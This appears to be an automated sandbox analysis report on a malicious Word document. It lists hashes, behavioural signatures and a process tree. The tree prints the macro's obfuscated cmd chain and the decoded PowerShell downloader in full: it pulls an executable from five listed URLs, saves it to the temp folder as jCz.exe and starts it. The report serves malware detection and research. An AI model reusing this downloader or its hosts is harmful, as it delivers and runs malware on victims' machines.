Analysis
-
max time kernel
138s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 02:10
Behavioral task
behavioral1
Sample
65a516955b0345b5e93bc29e27b2f386_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
65a516955b0345b5e93bc29e27b2f386_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
65a516955b0345b5e93bc29e27b2f386_JaffaCakes118.doc
-
Size
138KB
-
MD5
65a516955b0345b5e93bc29e27b2f386
-
SHA1
52717949c0beffd542f26611d403fba1f281a3de
-
SHA256
c72fd091e8a1d736c019d67277f221e67c198a4975cb38fa42e11ed8f363c677
-
SHA512
0c1424e2e346b40944bf512e38c027ffeacc43c494cafd0169174dc6feb20f2a920fd1ca3690828eab07b8fd0c5162e870ba30e1f34548542b3d2e2b36ecd7c8
-
SSDEEP
1536:Zu81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadp+aZys+Pz+kp:g8GhDS0o9zTGOZD6EbzCdXGaU
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1756 3172 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 48 1184 powershell.exe 50 1184 powershell.exe 53 1184 powershell.exe 55 1184 powershell.exe 57 1184 powershell.exe 60 1184 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3172 WINWORD.EXE 3172 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1184 powershell.exe 1184 powershell.exe 1184 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 748 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3172 WINWORD.EXE 3172 WINWORD.EXE 3172 WINWORD.EXE 3172 WINWORD.EXE 3172 WINWORD.EXE 3172 WINWORD.EXE 3172 WINWORD.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 3172 wrote to memory of 1756 3172 WINWORD.EXE cmd.exe PID 3172 wrote to memory of 1756 3172 WINWORD.EXE cmd.exe PID 1756 wrote to memory of 3248 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 3248 1756 cmd.exe cmd.exe PID 3248 wrote to memory of 3208 3248 cmd.exe cmd.exe PID 3248 wrote to memory of 3208 3248 cmd.exe cmd.exe PID 3248 wrote to memory of 2492 3248 cmd.exe cmd.exe PID 3248 wrote to memory of 2492 3248 cmd.exe cmd.exe PID 2492 wrote to memory of 3936 2492 cmd.exe cmd.exe PID 2492 wrote to memory of 3936 2492 cmd.exe cmd.exe PID 3936 wrote to memory of 3084 3936 cmd.exe cmd.exe PID 3936 wrote to memory of 3084 3936 cmd.exe cmd.exe PID 3936 wrote to memory of 5060 3936 cmd.exe findstr.exe PID 3936 wrote to memory of 5060 3936 cmd.exe findstr.exe PID 2492 wrote to memory of 1184 2492 cmd.exe powershell.exe PID 2492 wrote to memory of 1184 2492 cmd.exe powershell.exe PID 1184 wrote to memory of 748 1184 powershell.exe powershell.exe PID 1184 wrote to memory of 748 1184 powershell.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65a516955b0345b5e93bc29e27b2f386_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V:O/C"set SNT= }}{hctac}}kaerb;Uar$ ssecorP-tratS;)Uar$(elifotevas.wvt$;)ydoBesnopser.QjY$(etirw.wvt$;1 = epyt.wvt$;)(nepo.wvt${ )'*ZM*' ekil- txetesnopser.QjY$( fI;)(dnes.QjY$;)0,KlB$,'TEG'(nepo.QjY${yrt{)LLN$ ni KlB$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = wvt$;'ptthlmx.2lmxsm' moc- tcejbO-weN= QjY$;)'exe.zCj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=Uar$;)'@'(tilpS.'Y/ur.luanrab-robdopotva//:ptth@9t/au.moc.krowtenstrapotua//:ptth@KIizcsy/ua.moc.noitcurtsnoccke//:ptth@Y1nNI8w/moc.gniniartatarebilativ//:ptth@W4/ku.em.we-sivadwerdna//:ptth'=LLN$;'aVA'=jLE$ llehsrewop&&for /L %q in (568,-1,0)do set wM=!wM!!SNT:~%q,1!&&if %q==0 echo !wM:~4! |FOR /F "delims=.7XGv tokens=2" %u IN ('assoc^^^|findstr 1x')DO %u -"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V:O/C"set SNT= }}{hctac}}kaerb;Uar$ ssecorP-tratS;)Uar$(elifotevas.wvt$;)ydoBesnopser.QjY$(etirw.wvt$;1 = epyt.wvt$;)(nepo.wvt${ )'*ZM*' ekil- txetesnopser.QjY$( fI;)(dnes.QjY$;)0,KlB$,'TEG'(nepo.QjY${yrt{)LLN$ ni KlB$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = wvt$;'ptthlmx.2lmxsm' moc- tcejbO-weN= QjY$;)'exe.zCj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=Uar$;)'@'(tilpS.'Y/ur.luanrab-robdopotva//:ptth@9t/au.moc.krowtenstrapotua//:ptth@KIizcsy/ua.moc.noitcurtsnoccke//:ptth@Y1nNI8w/moc.gniniartatarebilativ//:ptth@W4/ku.em.we-sivadwerdna//:ptth'=LLN$;'aVA'=jLE$ llehsrewop&&for /L %q in (568,-1,0)do set wM=!wM!!SNT:~%q,1!&&if %q==0 echo !wM:~4! |FOR /F "delims=.7XGv tokens=2" %u IN ('assoc^^^|findstr 1x')DO %u -"3⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo powershell $ELj='AVa';$NLL='http://andrewdavis-ew.me.uk/4W@http://vitaliberatatraining.com/w8INn1Y@http://ekcconstruction.com.au/yscziIK@http://autopartsnetwork.com.ua/t9@http://avtopodbor-barnaul.ru/Y'.Split('@');$raU=([System.IO.Path]::GetTempPath()+'\jCz.exe');$YjQ =New-Object -com 'msxml2.xmlhttp';$tvw = New-Object -com 'adodb.stream';foreach($BlK in $NLL){try{$YjQ.open('GET',$BlK,0);$YjQ.send();If ($YjQ.responsetext -like '*MZ*') {$tvw.open();$tvw.type = 1;$tvw.write($YjQ.responseBody);$tvw.savetofile($raU);Start-Process $raU;break}}catch{}} "4⤵PID:3208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.7XGv tokens=2" %u IN ('assoc^|findstr 1x') DO %u -"4⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c assoc|findstr 1x5⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" assoc"6⤵PID:3084
-
C:\Windows\system32\findstr.exefindstr 1x6⤵PID:5060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =AVa6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82